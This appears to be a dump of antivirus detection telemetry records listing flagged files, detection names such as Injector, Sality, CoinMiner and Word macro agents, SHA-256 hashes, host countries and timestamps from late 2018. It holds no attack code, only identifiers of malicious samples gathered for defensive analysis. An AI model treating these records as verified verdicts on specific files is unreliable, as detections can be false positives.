  Row(detection=Row(filename='avscan-20181102-052131-20bff8be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052131-20BFF8BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053032-6355b648', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053032-6355B648', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052136-23b954f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052136-23B954F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052137-246991b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052137-246991B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054753-cfd904cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054753-CFD904CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060237-deb49834', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060237-DEB49834', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060350-0a4eaa6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060350-0A4EAA6A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052305-58d64c04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052305-58D64C04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062005-4f452afe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062005-4F452AFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055340-9e489f51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055340-9E489F51', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055529-dfaa6713', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055529-DFAA6713', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053636-3c04655e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053636-3C04655E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061808-09a684fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061808-09A684FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053003-51f7e18b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053003-51F7E18B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050446-c9b68a6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050446-C9B68A6A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060309-f1a960b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060309-F1A960B4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060252-e7d26cdd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060252-E7D26CDD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062701-47353cb0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062701-47353CB0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:27:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061034-fabd7d7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061034-FABD7D7F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050939-787041ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050939-787041CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051847-bf1924ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051847-BF1924AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051857-c508e474', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051857-C508E474', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fasil', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fasil', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='7a7861079f8bfbb11f413c6082bea20597e46c1b72e952e225c0cab6f75fbb4c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:18:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054140-f16bbb82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054140-F16BBB82', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053259-bb03ef76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053259-BB03EF76', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053714-52bbb112', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053714-52BBB112', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060033-949a9837', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060033-949A9837', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:29:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051436-298ef18d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051436-298EF18D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050824-4ba68788', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050824-4BA68788', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062411-e1cb13d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062411-E1CB13D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062651-4179777c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062651-4179777C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T21:08:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053431-f1ad584e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053431-F1AD584E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055720-21cd1051', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055720-21CD1051', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054347-3d47e6c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054347-3D47E6C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055933-70e8ae12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055933-70E8AE12', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052455-9a1908ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052455-9A1908CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:19:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051229-dd98f0a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051229-DD98F0A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055459-cd6a565c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055459-CD6A565C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050533-e585109a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050533-E585109A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055816-4350ee7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055816-4350EE7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060759-9ebbc415', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060759-9EBBC415', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060612-5efa3b16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060612-5EFA3B16', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060110-aaa92c85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060110-AAA92C85', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181031-152214-a87ad24f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d3ed30d1\\AVSCAN-20181031-152130-A169AC19\\AVSCAN-20181031-152214-A87AD24F', filesize=896000, name='TR/Muldrop.phzie.#M1.#R1'), hash='18c3b3e51d6d955dba0de350125894462d0e2a9518358e9ee6d45e6ce8c419c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:22:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-08-49-36.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T08:59:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-061744-b2894fb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ee0d11d2\\AVSCAN-20181101-055835-096D43F8\\AVSCAN-20181101-061744-B2894FB3', filesize=128000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='4f2c543edd9f54151ae962e25b743ac11b649e68ab9bcb8a66c0c5202edc2f7f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:17:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prounstl.exe', filepath='E:\\Softwares\\Gagibite 61M\\Network\\Intel\\PROXGB\\Win32\\NDIS63\\PROUnstl.exe', filesize=368000, name='W32/Sality.AT.#M1.#R1'), hash='18d48af599c5a4f3ca2f3e70974fa1e8273d34815a4483a113040aa1947c08b0', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\SCIENTER\\RestManage\\RestManage.exe', parentsize=3473408, timestamp='2018-11-01T03:17:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:59:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\autorun.exe', filesize=128000, name='TR/Dropper.Gen.#M300.#R3873'), hash='142187f2e53e6133e1a3f15c7e58f6758acb4f1864ade910537345f06c33b7e3', metadata=Row(cmdline='SCODEF:6348 CREDAT:78849 \\\\\\/prefetch:2', country='BE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=770608, timestamp='2018-11-01T11:20:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:07:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-100145-2eebc6fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3c21d6ca\\AVSCAN-20181101-095851-16A7EBA1\\AVSCAN-20181101-100145-2EEBC6FD', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:01:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2081432\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:21:34Z'), dt=datetime.date(2018, 11, 1)),
